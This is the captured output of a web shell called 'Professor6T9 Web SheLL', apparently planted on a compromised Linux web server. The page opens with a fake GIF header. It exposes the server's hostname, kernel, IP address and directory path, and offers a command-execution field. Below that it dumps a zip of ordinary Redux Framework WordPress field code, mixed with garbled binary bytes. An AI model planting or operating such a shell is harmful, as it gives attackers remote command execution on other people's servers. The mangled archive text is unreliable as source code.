GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux server1.hnhtechsolutions.com 4.18.0-553.78.1.el8_10.x86_64 #1 SMP Tue Oct 7 04:15:13 EDT 2025 x86_64
Apache
198.177.124.167
/
home
/
portfolio
/
public_html
/
private
[ HOME ]
Exec
Submit
File Name : fields.zip
PK FfZ%9i�O O password/index.phpnu �[��� <?php /** * Silence is golden. * * @package Redux Framework */ echo null; PK FfZB?�) ) password/field_password.phpnu �[��� <?php /** * Silence is golden. * * @package Redux Framework */ _deprecated_file( 'field_password.php', '4.3', 'class-redux-password.php', 'This file has been renamed and is no longer used in Redux 4. Please change any references to it as it will be removed in future versions of Redux.' ); PK FfZi���� � ! password/class-redux-password.phpnu �[��� <?php /** * Password Field. * * @package ReduxFramework/Fields * @author Dovy Paukstys & Kevin Provance (kprovance) * @version 4.0.0 */ defined( 'ABSPATH' ) || exit; if ( ! class_exists( 'Redux_Password', false ) ) { /** * Class Redux_Password */ class Redux_Password extends Redux_Field { /** * Field Render Function. * Takes the vars and outputs the HTML for the field in the settings * * @since ReduxFramework 1.0.1 */ public function render() { if ( ! empty( $this->field['username'] ) && true === $this->field['username'] ) { $this->render_combined_field(); } else { $this->render_single_field(); } } /** * This will render a combined User/Password field * * @since ReduxFramework 3.0.9 * @example * <code> * array( * 'id' => 'smtp_account', * 'type' => 'password', * 'username' => true, * 'title' => 'SMTP Account', * 'placeholder' => array('username' => 'Username') * ) * </code> */ private function render_combined_field() { $defaults = array( 'username' => '', 'password' => '', 'placeholder' => array( 'password' => esc_html__( 'Password', 'redux-framework' ), 'username' => esc_html__( 'Username', 'redux-framework' ), ), ); $this->value = wp_parse_args( $this->value, $defaults ); if ( ! empty( $this->field['placeholder'] ) ) { if ( is_array( $this->field['placeholder'] ) ) { if ( ! empty( $this->field['placeholder']['password'] ) ) { $this->value['placeholder']['password'] = $this->field['placeholder']['password']; } if ( ! empty( $this->field['placeholder']['username'] ) ) { $this->value['placeholder']['username'] = $this->field['placeholder']['username']; } } else { $this->value['placeholder']['password'] = $this->field['placeholder']; } } // Username field. echo '<input type="text" autocomplete="off" placeholder="' . esc_attr( $this->value['placeholder']['username'] ) . '" id="' . esc_attr( $this->field['id'] ) . '[username]" name="' . esc_attr( $this->field['name'] . $this->field['name_suffix'] ) . '[username]" value="' . esc_attr( $this->value['username'] ) . '" class="' . esc_attr( $this->field['class'] ) . '" /> '; // Password field. echo '<input type="password" autocomplete="off" placeholder="' . esc_attr( $this->value['placeholder']['password'] ) . '" id="' . esc_attr( $this->field['id'] ) . '[password]" name="' . esc_attr( $this->field['name'] . $this->field['name_suffix'] ) . '[password]" value="' . esc_attr( $this->value['password'] ) . '" class="' . esc_attr( $this->field['class'] ) . '" />'; } /** * This will render a single Password field * * @since ReduxFramework 3.0.9 * @example * <code> * array( * 'id' => 'smtp_password', * 'type' => 'password', * 'title' => 'SMTP Password' * ) * </code> */ private function render_single_field() { echo '<input type="password" id="' . esc_attr( $this->field['id'] ) . '" name="' . esc_attr( $this->field['name'] . $this->field['name_suffix'] ) . '" value="' . esc_attr( $this->value ) . '" class="' . esc_attr( $this->field['class'] ) . '" />'; } } } class_alias( 'Redux_Password', 'ReduxFramework_Password' ); PK FfZ&�[� � gallery/class-redux-gallery.phpnu �[��� <?php /** * Gallery Field. * * @package ReduxFramework/Fields * @author Dovy Paukstys & Kevin Provance (kprovance) * @version 4.0.0 */ defined( 'ABSPATH' ) || exit; // Don't duplicate me! if ( ! class_exists( 'Redux_Gallery', false ) ) { /** * Main Redux_gallery class * * @since 3.0.0 */ class Redux_Gallery extends Redux_Field { /** * Field Render Function. * Takes the vars and outputs the HTML for the field in the settings * * @since 1.0.0 * @access public * @return void */ public function render() { echo '<div class="screenshot">'; if ( ! empty( $this->value ) ) { $ids = explode( ',', $this->value ); foreach ( $ids as $attachment_id ) { $img = wp_get_attachment_image_src( $attachment_id ); $alt = wp_prepare_attachment_for_js( $attachment_id ); $alt = $alt['alt'] ?? ''; echo '<a class="of-uploaded-image" href="' . esc_url( $img[0] ) . '">'; echo '<img class="redux-option-image" id="image_' . esc_attr( $this->field['id'] ) . '_' . esc_attr( $attachment_id ) . '" src="' . esc_url( $img[0] ) . '" alt="' . esc_attr( $alt ) . '" target="_blank" rel="external" />'; echo '</a>'; } } echo '</div>'; echo '<a href="#" onclick="return false;" id="edit-gallery" class="gallery-attachments button button-primary">' . esc_html__( 'Add/Edit Gallery', 'redux-framework' ) . '</a> '; echo '<a href="#" onclick="return false;" id="clear-gallery" class="gallery-attachments button">' . esc_html__( 'Clear Gallery', 'redux-framework' ) . '</a>'; echo '<input type="hidden" class="gallery_values ' . esc_attr( $this->field['class'] ) . '" value="' . esc_attr( $this->value ) . '" name="' . esc_attr( $this->field['name'] . $this->field['name_suffix'] ) . '" />'; } /** * Enqueue Function. * If this field requires any scripts, or css define this function and register/enqueue the scripts/css * * @since 1.0.0 * @access public * @return void */ public function enqueue() { if ( function_exists( 'wp_enqueue_media' ) ) { wp_enqueue_media(); } else { wp_enqueue_script( 'media-upload' ); wp_enqueue_script( 'thickbox' ); wp_enqueue_style( 'thickbox' ); } wp_enqueue_script( 'redux-field-gallery-js', Redux_Core::$url . 'inc/fields/gallery/redux-gallery' . Redux_Functions::is_min() . '.js', array( 'jquery', 'redux-js' ), $this->timestamp, true ); } } } class_alias( 'Redux_Gallery', 'ReduxFramework_Gallery' ); PK FfZ%9i�O O gallery/index.phpnu �[��� <?php /** * Silence is golden. * * @package Redux Framework */ echo null; PK FfZh�js s gallery/redux-gallery.jsnu �[��� /* global redux_change, wp, redux */ (function( $ ) { 'use strict'; redux.field_objects = redux.field_objects || {}; redux.field_objects.gallery = redux.field_objects.gallery || {}; redux.field_objects.gallery.init = function( selector ) { selector = $.redux.getSelector( selector, 'gallery' ); $( selector ).each( function() { var el = $( this ); var parent = el; if ( ! el.hasClass( 'redux-field-container' ) ) { parent = el.parents( '.redux-field-container:first' ); } if ( parent.is( ':hidden' ) ) { return; } if ( parent.hasClass( 'redux-field-init' ) ) { parent.removeClass( 'redux-field-init' ); } else { return; } // When the user clicks on the Add/Edit gallery button, we need to display the gallery editing. el.on( { click: function( event ) { var current_gallery; var final; var val; var frame; var uploader; var spinner; var inline; // Hide gallery settings used for posts/pages. wp.media.view.Settings.Gallery = wp.media.view.Settings.Gallery.extend( { template: function() { return; } } ); current_gallery = $( this ).closest( 'fieldset' ); if ( 'clear-gallery' === event.currentTarget.id ) { // Remove value from input. current_gallery.find( '.gallery_values' ).val( '' ); // Remove preview images. current_gallery.find( '.screenshot' ).html( '' ); return; } // Make sure the media gallery API exists. if ( 'undefined' === typeof wp || ! wp.media || ! wp.media.gallery ) { return; } event.preventDefault(); // Activate the media editor. val = current_gallery.find( '.gallery_values' ).val(); if ( ! val ) { final = '[gallery ids="0"]'; } else { final = '[gallery ids="' + val + '"]'; } frame = wp.media.gallery.edit( final ); if ( ! val ) { uploader = $( 'body' ).find( '#' + frame.el.id ); inline = uploader.find( '.uploader-inline' ); spinner = uploader.find( '.media-toolbar .spinner' ); setTimeout( function() { if ( inline.hasClass( 'hidden' ) ) { inline.removeClass( 'hidden' ); spinner.removeClass( 'is-active' ); } }, 400 ); } // When the gallery-edit state is updated, copy the attachment ids across. frame.state( 'gallery-edit' ).on( 'update', function( selection ) { var ids; var element; var preview_img; var preview_html = ''; // Clear screenshot div so we can append new selected images. current_gallery.find( '.screenshot' ).html( '' ); ids = selection.models.map( function( e ) { element = e.toJSON(); preview_img = ( 'undefined' !== typeof element.sizes && 'undefined' !== typeof element.sizes.thumbnail ) ? element.sizes.thumbnail.url : element.url; preview_html = '<a class="of-uploaded-image" href="' + preview_img + '"><img class="redux-option-image" src="' + preview_img + '" alt="" /></a>'; current_gallery.find( '.screenshot' ).append( preview_html ); return e.id; } ); current_gallery.find( '.gallery_values' ).val( ids.join( ',' ) ); redux_change( current_gallery.find( '.gallery_values' ) ); frame.detach(); } ); return false; } }, '.gallery-attachments' ); } ); }; })( jQuery ); PK FfZ�W1�" " gallery/redux-gallery.min.jsnu �[��� !function(n){"use strict";redux.field_objects=redux.field_objects||{},redux.field_objects.gallery=redux.field_objects.gallery||{},redux.field_objects.gallery.init=function(e){e=n.redux.getSelector(e,"gallery"),n(e).each(function(){var e=n(this),i=e;(i=e.hasClass("redux-field-container")?i:e.parents(".redux-field-container:first")).is(":hidden")||i.hasClass("redux-field-init")&&(i.removeClass("redux-field-init"),e.on({click:function(e){var l,a,i,d,t;return wp.media.view.Settings.Gallery=wp.media.view.Settings.Gallery.extend({template:function(){}}),l=n(this).closest("fieldset"),"clear-gallery"===e.currentTarget.id?(l.find(".gallery_values").val(""),void l.find(".screenshot").html("")):"undefined"!=typeof wp&&wp.media&&wp.media.gallery?(e.preventDefault(),i=(e=l.find(".gallery_values").val())?'[gallery ids="'+e+'"]':'[gallery ids="0"]',a=wp.media.gallery.edit(i),e||(i=n("body").find("#"+a.el.id),t=i.find(".uploader-inline"),d=i.find(".media-toolbar .spinner"),setTimeout(function(){t.hasClass("hidden")&&(t.removeClass("hidden"),d.removeClass("is-active"))},400)),a.state("gallery-edit").on("update",function(e){var i;l.find(".screenshot").html(""),e=e.models.map(function(e){return i=e.toJSON(),i=(void 0!==i.sizes&&void 0!==i.sizes.thumbnail?i.sizes.thumbnail:i).url,i='<a class="of-uploaded-image" href="'+i+'"><img class="redux-option-image" src="'+i+'" alt="" /></a>',l.find(".screenshot").append(i),e.id}),l.find(".gallery_values").val(e.join(",")),redux_change(l.find(".gallery_values")),a.detach()}),!1):void 0}},".gallery-attachments"))})}}(jQuery);PK FfZ ��' ' gallery/field_gallery.phpnu �[��� <?php /** * Silence is golden. * * @package Redux Framework */ _deprecated_file( 'field_gallery.php', '4.3', 'class-redux-gallery.php', 'This file has been renamed and is no longer used in Redux 4. Please change any references to it as it will be removed in future versions of Redux.' ); PK FfZuUn� ) select_image/class-redux-select-image.phpnu �[��� <?php /** * Field Select Image * * @package Redux Framework/Fields * @since 3.1.2 * @author Kevin Provance <kprovance> * @version 4.0.0 */ defined( 'ABSPATH' ) || exit; if ( ! class_exists( 'Redux_Select_Image', false ) ) { /** * Class Redux_Select_Image */ class Redux_Select_Image extends Redux_Field { /** * Set field defaults. */ public function set_defaults() { $defaults = array( 'options' => array(), 'placeholder' => esc_html__( 'Select an item', 'redux-framework' ), ); $this->field = wp_parse_args( $this->field, $defaults ); } /** * Field Render Function. * Takes the vars and outputs the HTML for the field in the settings * * @since ReduxFramework 1.0.0 */ public function render() { // If options is NOT empty, the process. if ( ! empty( $this->field['options'] ) ) { // bean counter. $x = 1; // Process width. if ( ! empty( $this->field['width'] ) ) { $width = ' style="width:' . esc_attr( $this->field['width'] ) . ';"'; } else { $width = ' style="width: 40%;"'; } // Process placeholder. $placeholder = esc_attr( $this->field['placeholder'] ); $this->select2_config['allowClear'] = true; if ( isset( $this->field['select2'] ) ) { $this->field['select2'] = wp_parse_args( $this->field['select2'], $this->select2_config ); } else { $this->field['select2'] = $this->select2_config; } $this->field['select2'] = Redux_Functions::sanitize_camel_case_array_keys( $this->field['select2'] ); $select2_data = Redux_Functions::create_data_string( $this->field['select2'] ); // Begin the <select> tag. echo '<select data-id="' . esc_attr( $this->field['id'] ) . '" data-placeholder="' . esc_attr( $placeholder ) . '" name="' . esc_attr( $this->field['name'] . $this->field['name_suffix'] ) . '" class="redux-select-item redux-select-images ' . esc_attr( $this->field['class'] ) . '"' . $width . ' rows="6"' . esc_attr( $select2_data ) . '>'; // phpcs:ignore WordPress.Security.EscapeOutput echo '<option></option>'; // Enum through the options array. foreach ( $this->field['options'] as $v ) { // No array? No problem! if ( ! is_array( $v ) ) { $v = array( 'img' => $v ); } // No title set? Make it blank. if ( ! isset( $v['title'] ) ) { $v['title'] = ''; } // No alt? Set it to title. We do this so the alt tag shows // something. It also makes HTML/SEO purists happy. if ( ! isset( $v['alt'] ) ) { $v['alt'] = $v['title']; } // Set the selected entry. $selected = selected( $this->value, $v['img'], false ); // If selected returns something other than a blank space, we // found our default/saved name. Save the array number in a // variable to use later on when we want to extract its associated // url. if ( '' !== $selected ) { $arr_num = $x; } // Add the option tag, with values. echo '<option value="' . esc_url( $v['img'] ) . '" ' . esc_html( $selected ) . '>' . esc_attr( $v['alt'] ) . '</option>'; // Add a bean. $x ++; } // Close the <select> tag. echo '</select>'; // Some space. echo '<br /><br />'; // Show the preview image. echo '<div>'; // just in case. You never know. if ( ! isset( $arr_num ) ) { $this->value = ''; } // Set the default image. To get the url from the default name, // we save the array count from the for/each loop, when the default image // is mark as selected. Since the for/each loop starts at one, we must // subtract one from the saved array number. We then pull the url // out of the options array, and there we go. if ( '' === $this->value ) { echo '<img src="#" class="redux-preview-image" style="visibility:hidden;" id="image_' . esc_attr( $this->field['id'] ) . '">'; } else { echo '<img src=' . esc_url( $this->value ) . ' class="redux-preview-image" id="image_' . esc_attr( $this->field['id'] ) . '">'; } // Close the <div> tag. echo '</div>'; } else { // No options specified. Really? echo '<strong>' . esc_html__( 'No items of this type were found.', 'redux-framework' ) . '</strong>'; } } /** * Enqueue Function. * If this field requires any scripts, or css define this function and register/enqueue the scripts/css * * @since ReduxFramework 1.0.0 */ public function enqueue() { wp_enqueue_style( 'select2-css' ); wp_enqueue_script( 'redux-field-select-image-js', Redux_Core::$url . 'inc/fields/select_image/redux-select-image' . Redux_Functions::is_min() . '.js', array( 'jquery', 'select2-js', 'redux-js' ), $this->timestamp, true ); if ( $this->parent->args['dev_mode'] ) { wp_enqueue_style( 'redux-field-select-image-css', Redux_Core::$url . 'inc/fields/select_image/redux-select-image.css', array(), $this->timestamp ); } } } } class_alias( 'Redux_Select_Image', 'ReduxFramework_Select_Image' ); PK FfZ�F�Q� � # select_image/redux-select-image.cssnu �[��� .redux-container-select_image { margin-top: 2px; margin-left: 5px; width: 100%; margin-bottom: 0; } .redux-preview-image { max-height: 250px; max-width: 250px; padding: 5px; margin-top: 10px; border: 1px solid #e3e3e3; background: #f7f7f7; border-radius: 3px; } /*# sourceMappingURL=data:application/json;charset=utf8;base64,eyJ2ZXJzaW9uIjozLCJmaWxlIjoicmVkdXgtc2VsZWN0LWltYWdlLmNzcyIsInNvdXJjZXMiOlsicmVkdXgtc2VsZWN0LWltYWdlLnNjc3MiXSwibmFtZXMiOltdLCJtYXBwaW5ncyI6IkFBQUEsQUFBQSw2QkFBNkIsQ0FBQyxFQUMxQixVQUFVLEVBQUUsR0FBRyxFQUNmLFdBQVcsRUFBRSxHQUFHLEVBQ2hCLEtBQUssRUFBRSxJQUFJLEVBQ1gsYUFBYSxFQUFFLENBQUMsR0FDbkI7O0FBRUQsQUFBQSxvQkFBb0IsQ0FBQyxFQUNqQixVQUFVLEVBQUUsS0FBSyxFQUNqQixTQUFTLEVBQUUsS0FBSyxFQUNoQixPQUFPLEVBQUUsR0FBRyxFQUNaLFVBQVUsRUFBRSxJQUFJLEVBQ2hCLE1BQU0sRUFBRSxpQkFBaUIsRUFDekIsVUFBVSxFQUFFLE9BQU8sRUFDbkIsa0JBQWtCLEVBQUUsR0FBRyxFQUN2QixvQkFBb0IsRUFBRSxHQUFHLEVBQ3pCLHFCQUFxQixFQUFFLEdBQUcsRUFDMUIsYUFBYSxFQUFFLEdBQUcsR0FDckIifQ== */ /*# sourceMappingURL=redux-select-image.css.map */ PK FfZ%9i�O O select_image/index.phpnu �[��� <?php /** * Silence is golden. * * @package Redux Framework */ echo null; PK FfZ��k� � $ select_image/redux-select-image.scssnu �[��� .redux-container-select_image { margin-top: 2px; margin-left: 5px; width: 100%; margin-bottom: 0; } .redux-preview-image { max-height: 250px; max-width: 250px; padding: 5px; margin-top: 10px; border: 1px solid #e3e3e3; background: #f7f7f7; -moz-border-radius: 3px; -khtml-border-radius: 3px; -webkit-border-radius: 3px; border-radius: 3px; } PK FfZ�K�� � &